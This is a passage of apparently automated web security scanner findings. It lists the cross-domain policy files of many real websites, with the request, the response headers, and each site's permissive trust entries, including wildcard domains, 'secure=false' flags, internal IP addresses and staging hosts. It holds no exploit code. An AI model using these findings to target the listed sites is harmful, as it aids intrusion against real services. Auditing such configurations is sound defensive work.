HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Wed, 23 Mar 2011 19:03:58 GMT Content-Type: text/xml Expires: Sat, 02 Apr 2011 13:23:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:23:33 GMT Content-Length: 2622 Connection: close s-srvr: <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.sears.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cerosmedia.com" to-ports="*"/> <allow-access-from domain="*.cerosdevelopment.com"/> <allow-access-from domain="*.lightmakerorlando.com"/> <allow-access-from domain="*.richrelevance.com"/> <allow-access-from domain="*.blinds.net"/> <allow-access-from domain="*.zemoga.com"/> <allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.allurent.net" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.fuelindustries.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cmycasa.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.fluid.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cerosmedia.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.cerosdevelopment.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.lightmakerorlando.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.cerosstaging.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.sears.fluid.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.fluid.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.craftsman.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.allurent.net" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.productiveedge.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.zemoga.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.kenmore.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.kmart.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.colossal-squid.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.digitalfolio.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.sears.realartusa.com" to-ports="*" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.seattlepi.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.seattlepi.com |
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 Content-Length: 228 Content-Type: text/xml ETag: "9b1c2bc9396c81:fae" Expires: Sat, 02 Apr 2011 13:32:09 GMT Date: Sat, 02 Apr 2011 13:32:09 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.seattlepi.nwsource.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.shangri-la.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.shangri-la.com |
HTTP/1.0 200 OK Content-Length: 412 Content-Type: text/xml Content-Location: http://www.shangri-la.com Last-Modified: Mon, 04 Oct 2010 03:28:26 GMT Accept-Ranges: bytes ETag: "f8ab31357463cb1:4f30" Server: Microsoft-IIS/6.0 X-WebServer-By: WEB02 X-Powered-By: ASP.NET Access-Control-Allow Date: Sat, 02 Apr 2011 13:44:49 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy xmlns:xsi="http://www.w3 xsi:noNamespaceSchem <allow-access-from domain="*.shangri-la.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.shopathome.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.shopathome.com |
HTTP/1.1 200 OK Content-Length: 273 Content-Type: text/xml Last-Modified: Wed, 19 May 2010 23:27:23 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa OUR NOR PUR" X-Server: Web03 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:26:52 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="shopathome.com" /> <allow-access-from domain="*.shopathome.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.shopstyle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.shopstyle.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:37:49 GMT Server: Apache/2.2.13 (Unix) Last-Modified: Tue, 17 Mar 2009 19:25:12 GMT Accept-Ranges: bytes Content-Length: 217 Vary: Accept-Encoding P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT" Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.shopstyle.com" /> </cros ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.shutterfly.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.shutterfly.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:00 GMT Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"970-1280438871000" Last-Modified: Thu, 29 Jul 2010 21:27:51 GMT Content-Type: application/xml Content-Length: 970 Set-Cookie: lb=WFEu3qVZ-app196; Path=/ Set-Cookie: BIGipServerAPP-B-LR Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.shutterfly.com" secure="false" to-ports="443" /> ...[SNIP]... <allow-access-from domain="*.staticsfly.com" secure="false" to-ports="443" /> ...[SNIP]... <allow-access-from domain="*.betawave.com" secure="false" to-ports="80,443" /> ...[SNIP]... <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.simon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.simon.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 May 2010 18:11:42 GMT Accept-Ranges: bytes ETag: "083f9ec8fdca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 02 Apr 2011 14:09:18 GMT Connection: close Content-Length: 346 ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.stanfordshop.com"/> <allow-access-from domain="stanfordshop.com"/> <allow-access-from domain="*.cdn.cloudfiles ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.simplyhired |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.simplyhired.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 12:44:06 GMT Content-Type: text/xml Connection: close Set-Cookie: gc=1; expires=Sun, 03-Apr-2011 12:44:06 GMT; path=/ P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Length: 120 <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*.thespringbox.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sixflags.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sixflags.com |
HTTP/1.1 200 OK Content-Length: 267 Content-Type: text/xml Last-Modified: Thu, 05 Mar 2009 19:53:24 GMT Accept-Ranges: bytes ETag: "79c111bcc9dc91:6ff" Server: Microsoft-IIS/6.0 X-Powered-By: web3 Date: Sat, 02 Apr 2011 14:10:24 GMT Connection: close <?xml version="1.0"?> <!-- http://www.sixflags.com <cross-domain-policy> <allow-access-from domain="*.cygnus.com" /> <allow-access-from domain="*.accesso.com" /> <allow-access-from domain="*.ceiris.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sky.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sky.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 16 Mar 2011 14:58:52 GMT Content-Type: text/xml ETag: "pvcb59ab292c695f24a Expires: Sat, 02 Apr 2011 14:00:15 GMT Cache-Control: private, max-age=60 X-PvInfo: [S10202.C10879.A67423.RA0 X-Cnection: Close Date: Sat, 02 Apr 2011 13:59:15 GMT Content-Length: 444 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.sky.com" /> <allow-access-from domain="*.bskyb.com" /> <allow-access-from domain="*.doubleclick.com" /> <allow-access-from domain="*.doubleclick.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.skype.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.skype.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:14 GMT Server: Apache Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT ETag: "1a2-4929031207800" Accept-Ranges: bytes Content-Length: 418 Vary: Accept-Encoding,User Connection: close Content-Type: application/xml Content-Language: en <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.skype.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.skype.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.skype.test" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.slate.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.slate.com |
HTTP/1.1 200 OK Cache-Control: max-age=864000 Content-Length: 284 Content-Type: text/xml Last-Modified: Fri, 21 May 2010 14:41:54 GMT Accept-Ranges: bytes ETag: "3c258fc1f3f8ca1:64" Server: Microsoft-IIS/6.0 Date: Sat, 02 Apr 2011 13:30:57 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*.slate.com" /> <allow-access-from domain="*.slatev.com" /> <allow-access-from domain="*.wpni.com" /> <allow-access-from domain="*.washingtonpost.com" /> <allow-access-from domain="*.brightcove.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.slide.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.slide.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:27:09 GMT Server: Apache/2.2 Last-Modified: Thu, 24 Mar 2011 21:19:25 GMT Vary: Accept-Encoding X-Host: wb0.la1 Content-Length: 845 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.slide.com" /> <allow-access-from domain="*.slideobjects.com" /> <allow-access-from domain="*.superpokepets.com" /> <allow-access-from domain="*.socialstar.com" /> <allow-access-from domain="*.sppranch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.smarter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.smarter.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:08 GMT Server: Apache Last-Modified: Tue, 11 May 2010 05:55:40 GMT ETag: "76740-d6-4864b2cda0f00" Accept-Ranges: bytes Content-Length: 214 Vary: Accept-Encoding,User Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.smarter.com" /> </cross-d ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.smilebox.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.smilebox.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:04 GMT Server: Apache Last-Modified: Tue, 02 Nov 2010 00:51:13 GMT ETag: "455018d-e9-4940752486240 Accept-Ranges: bytes Content-Length: 233 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.smilebox.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.smileycentral |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.smileycentral.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:31:21 GMT Server: Apache/1.3.27 (Unix) Resin/2.0.5 Pragma: no-cache Cache-control: max-age=0, must-revalidate Expires: Sat 02 Apr 1977 17:15:00 GMT Last-Modified: Mon, 21 Aug 2006 19:26:26 GMT ETag: "679080-e7-44ea08e2" Accept-Ranges: bytes Content-Length: 231 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.smileycentral.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.snapfish.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.snapfish.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:31 GMT Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"7097-1301617465000" Last-Modified: Fri, 01 Apr 2011 00:24:25 GMT Content-Type: application/xml Content-Length: 7097 Connection: close Set-Cookie: BIGipServersf3-scw-pod2 <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.clarkcolor.com" secure="false" /> <allow-http-request ...[SNIP]... <allow-access-from domain="*.snapfish-epuzzle.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.mysticcolorlab.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.at" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.be" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.ch" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.co.in" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.com.au" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.com.sg" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.co.nz" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.co.uk" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.de" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.es" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.eu" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.fr" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.it" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.jp" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.lu" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.nl" secure="false" /> ...[SNIP]... <allow-access-from domain="*.snapfish.se" secure="false" /> ...[SNIP]... <allow-access-from domain="*.truprint.co.uk" secure="false" /> ...[SNIP]... <allow-access-from domain="*.walgreens.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.walmart.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.yorkphoto.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.akamai-trials.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.goosiecards.com" secure="false"/> ...[SNIP]... <allow-access-from domain="images1.sfus1.qa.snapfish ...[SNIP]... <allow-access-from domain="images2.sfus1.qa.snapfish ...[SNIP]... <allow-access-from domain="*.qa.snapfish.com" secure="false"/> ...[SNIP]... <allow-access-from domain="http://www2.sfsg1.qa ...[SNIP]... <allow-access-from domain="http://www1.sfsg1.qa ...[SNIP]... <allow-access-from domain="http://garskin.asia" secure="false"/> ...[SNIP]... <allow-access-from domain="*.garskin.asia" secure="false"/> ...[SNIP]... <allow-access-from domain="http://dgsc.photo2 ...[SNIP]... <allow-access-from domain="localhost" secure="false"/> ...[SNIP]... <allow-access-from domain="127.0.0.1" secure="false"/> ...[SNIP]... <allow-access-from domain="*.locr.com" /> <allow-access-from domain="*.wissenswerft.net" /> <allow-access-from domain="50.16.223.152" secure="false"/> ...[SNIP]... <allow-access-from domain="snapfish.fingerprintpress <allow-access-from domain="snapfish-staging <allow-access-from domain="apps.ezprints.com" /> <allow-access-from domain="http://snapfish ...[SNIP]... <allow-access-from domain="http://snapfish-stage ...[SNIP]... <allow-access-from domain="*.kidlandia.com" secure="false" /> ...[SNIP]... <allow-access-from domain="publisherapp.myprinting ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.softonic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.softonic.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:35 GMT Server: Apache Expires: Sat, 02 Apr 2011 15:10:36 GMT Cache-Control: max-age=5401, public Last-Modified: Sat, 02 Apr 2011 11:10:36 GMT ETag: "ec2faefc0402e177782 Set-Cookie: softonic_es-admin=deleted Set-Cookie: blang=_; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com Set-Cookie: country=US; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com Set-Cookie: ucountry=NA; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com Set-Cookie: sads_country=US; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com Set-Cookie: entry=Direct; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com Set-Cookie: PHPSESSID=d2964ace00 Vary: Accept-Encoding,User Content-Length: 963 Connection: close Content-Type: application/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain-p ...[SNIP]... <allow-access-from domain="*.softonic.com/" to-ports="*" /> <allow-access-from domain="*.onsoftware.com" to-ports="*" /> <allow-access-from domain="screencast-us.softonic <allow-access-from domain="screencast-eu.softonic <allow-access-from domain="*.sftcdn.net" to-ports="*" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.spanishdict |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.spanishdict.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:41:49 GMT Server: Apache Last-Modified: Mon, 03 Aug 2009 16:43:52 GMT ETag: "16e-4703f79968200" Accept-Ranges: bytes Content-Length: 366 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 13:41:49 GMT Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.spanishdict.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sdsandbox.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sdswift.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.spellingcity |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.spellingcity.com |
HTTP/1.1 200 OK Server: nginx/0.9.5 Date: Sat, 02 Apr 2011 13:43:11 GMT Content-Type: text/xml Content-Length: 278 Last-Modified: Tue, 30 Nov 2010 17:56:31 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.spellingcity.com" /> <allow-access-from domain="*.vocabulary.co.il" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sportsaut |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sportsauthority.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:07:08 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT ETag: "4dc032-35e-4928fc0d4e900 Accept-Ranges: bytes Content-Length: 862 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 14:07:08 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="tsa.imageg.net" /> <allo ...[SNIP]... <allow-access-from domain="*.gspt.net" secure="true" /> ...[SNIP]... <allow-access-from domain="*.gsipartners.com" secure="true" /> ...[SNIP]... <allow-access-from domain="172.20.1.174" /> <allow-access-from domain="172.21.1.174" /> <allow-access-from domain="206.16.220.174" /> <allow-access-from domain="63.240.110.174" /> <allow-access-from domain="pm.allurent.net" /> <allow-access-from domain="*.pm.allurent.net" /> <allow-access-from domain="*.shared.allurent.net" /> <allow-access-from domain="*.sportsauthority <allow-access-from domain="*.fetchback.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.star-telegram |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.star-telegram.com |
HTTP/1.0 200 OK Server: Apache/1.3.41 Last-Modified: Mon, 22 Jun 2009 18:43:30 GMT ETag: "4112e8-db-4a3fd0d2" Content-Type: application/xml Date: Sat, 02 Apr 2011 14:05:56 GMT Content-Length: 219 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.star-telegram.com" /> </cro ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.startribune |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.startribune.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Sat, 02 Apr 2011 06:01:28 GMT X-Server-Name: sj-c14-r8-u31-b5 Content-Type: text/html;charset=utf-8 Date: Sat, 02 Apr 2011 13:37:30 GMT Content-Length: 907 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.startribune.com" /> <allow-access-from domain="cms.clickability.com" /> <allow-access-from domain="ww2.startribune.com" /> <allow-access-from domain="webdev1.startribune.com" /> <allow-access-from domain="www.printthis.clicka <allow-access-from domain="dev.www.startribune.com" /> <allow-access-from domain="stage.www.startribune.com" /> <allow-access-from domain="prepstest.startribune.com" /> <allow-access-from domain="preps.startribune.com" /> <allow-access-from domain="gamefacemn.startribune <allow-access-from domain="elections.startribune.com" /> <allow-access-from domain="dev.beta.startribune.com" /> <allow-access-from domain="stage.beta.startribune ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.stumbleupon |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.stumbleupon.com |
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT Content-Type: application/xml Content-Length: 460 Date: Sat, 02 Apr 2011 12:38:09 GMT X-Varnish: 818641328 Age: 0 Via: 1.1 varnish Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.stumbleupon <allow-access-from domain="*.stumble.net" /> <allow-access-from domain="stumble.net" /> <allow-access-from domain="*.stumbleupon.com" /> <allow-access-from domain="stumbleupon.com" /> <allow-access-from domain="cdn.stumble-upon.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.stylelist.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.stylelist.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:40 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 318 Keep-Alive: timeout=5, max=999972 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.aol.com" /> <allow-access-from domain="*.blogsmithmedia.com" /> <allow-access-from domain="*.unicast.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.superpages.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.superpages.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:24:28 GMT Server: Unspecified Vary: Host Last-Modified: Tue, 29 Mar 2011 15:26:29 GMT ETag: "1b6e-d7-af271340" Accept-Ranges: bytes Content-Length: 215 Connection: close Content-Type: application/xml Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.kewlbox.com" /> </cross ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.symantec.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.symantec.com |
HTTP/1.0 200 OK Server: Sun-Java-System-Web Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT ETag: "22a-4b03330b" Content-Type: text/xml Cache-Control: public, max-age=2219 Date: Sat, 02 Apr 2011 13:26:53 GMT Content-Length: 554 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!--File added for Flash apps--> <cross-domain-policy> <allow-access-from domain="*.symantec.com"/> <allow-access-from domain="*.norton.com"/> <allow-access-from domain="*.symantecstore.com"/> <allow-access-from domain="*.nortonopscenter.com"/> <allow-access-from domain="*.securityprofessional <allow-access-from domain="*.securitydash.com"/> <allow-access-from domain="*.brightcove.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.t-mobile.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.t-mobile.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 10 Aug 2009 20:02:39 GMT Accept-Ranges: bytes ETag: "8099f83f519ca1:0" Server: Microsoft-IIS/7.0 Date: Sat, 02 Apr 2011 13:31:15 GMT Connection: close Content-Length: 603 <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="convertlanguage.com"/> <allow-access-from domain="*.convertlanguage.com"/> <allow-access-from domain="207.211.37.60"/> <allow-access-from domain="t-mobile.com"/> <allow-access-from domain="*.t-mobile.com"/> <allow-access-from domain="es.t-mobile.com"/> <allow-access-from domain="estmobile.convertlanguage <allow-access-from domain="support.t-mobile.com"/> <allow-access-from domain="*.tmocache.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tagged.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tagged.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:26:08 GMT Server: Apache Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT ETag: "25b7fc-15d-49f3cbe55f0c0 Accept-Ranges: bytes Content-Length: 349 Vary: Accept-Encoding,User Keep-Alive: timeout=300 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.tagstat.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.target.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.target.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:38:20 GMT Server: Server Last-Modified: Fri, 14 Jan 2011 22:27:33 GMT ETag: "13d-f0bf5f40" Accept-Ranges: bytes Content-Length: 317 Vary: Accept-Encoding,User Cneonction: close Content-Type: text/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.amazon.com" /> <allow-access-from domain="*.images-amazon.com" /> <allow-access-from domain="*.target.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tarot.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tarot.com |
